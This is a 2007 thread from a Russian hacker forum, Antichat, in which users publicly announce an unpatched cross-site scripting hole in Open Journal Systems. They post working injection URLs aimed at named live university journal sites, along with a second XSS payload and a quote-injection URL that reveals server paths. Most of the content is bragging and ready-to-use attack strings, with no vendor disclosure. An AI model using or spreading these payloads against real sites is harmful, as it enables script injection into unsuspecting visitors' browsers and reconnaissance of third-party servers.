Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Xss в Ojs (https://forum.antichat.xyz/showthread.php?t=36278)

BlackCats 24.03.2007 20:37
Xss в Ojs
 
я нашёл ещё 1 уязвимость в паблик скрипте - которой нету в паблике(уязвимости :) )
итак, на этот раз это XSS присутствует в журналах
Open Journal Systems - версию определить неудалось, предполагается что во всех ныне используемых.
http://pkp.sfu.ca/?q=ojs - сайт разработчика


Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки данных в адресной строке.Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценарий в браузере жертвы.

Способ устранения уязвимости не известен в настоящее время.

примеры:

Код:
http://ejournals.library.vanderbilt.edu/ameriquests/rst/rst.php?op=capture_cite&id=21%22%3E%3Cscript%3Ealert(99)%3C/script%3E
и
Код:
http://jqstudies.oise.utoronto.ca/journal/rst/rst.php?op=capture_cite&id=21%22%3E%3Cscript%3Ealert(99)%3C/script%3E
т.е. мы подставляем сразу после id=**свой скрипт и всё :)

D=P=CH= MOD= 24.03.2007 21:10
Цитата:
Способ устранения уязвимости не известен в настоящее время.
=) поставить фильтры на эти параметры да и все)
Цитата:
надеюсь отдельные индивидумы увидят что я достаточно активен на форуме!
Ты думаеш после таких вы*бонов тебя возьмут?

У меня о тебе мнение сильно изменилось.

BlackCats 24.03.2007 21:26
блин..
D=p=ch= Mod= отписал... как ко мне относяца, так и я.

а остальные странные какието :) констинтин - типо непонравилось? ээ.. так и не должно нравица :) просто нашёл уязвимость - выложил

D=P=CH= MOD= 24.03.2007 21:30
Я тебе отписал, что это мое мнение.

А эту xss мог и просто выложить туда, где все их кидают и не писать, чтобы тебя заметили...

=) а первый пост, то ты отредактил))

XTErner 24.03.2007 21:56
Обычная, обыденная Xssка которой место в топике Xss ,но за старание +))
(имхо)

BlackCats 24.03.2007 22:16
нет, эта xсs не обыденная - она отличаеца тем, что обыденные просто на сайтах - а эта - я 1 раз нашёл и теперь если вы увидите такой двиг - то сразу сможете знать что в нём есть хсс, и где она.

_Pantera_ 24.03.2007 22:21
молодец, +3

BlackCats 24.03.2007 22:26
спасибо :)

ettee 24.03.2007 22:27
PHP код:
target/ameriquests/viewarticle.php?id=53%22%3E%3Cscript%3Ealert(/ettee/)%3C/script%3E 
раскрытие пути
PHP код:
target/ameriquests/search.php?op=advanced_search&query=%27&query_author=&query_title=&query_date_from_month=&query_date_from_day=&query_date_from_year=&query_date_to_month=&query_date_to_day=&query_date_to_year=&query_discipline=&query_topics=&query_approach=&query_coverage=&query_type=All 

BlackCats 24.03.2007 22:40
Цитата:
Сообщение от ettee
PHP код:
target/ameriquests/viewarticle.php?id=53%22%3E%3Cscript%3Ealert(/ettee/)%3C/script%3E 
раскрытие пути
PHP код:
target/ameriquests/search.php?op=advanced_search&query=%27&query_author=&query_title=&query_date_from_month=&query_date_from_day=&query_date_from_year=&query_date_to_month=&query_date_to_day=&query_date_to_year=&query_discipline=&query_topics=&query_approach=&query_coverage=&query_type=All 

спасибо за дополнение.


Время: 06:27
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице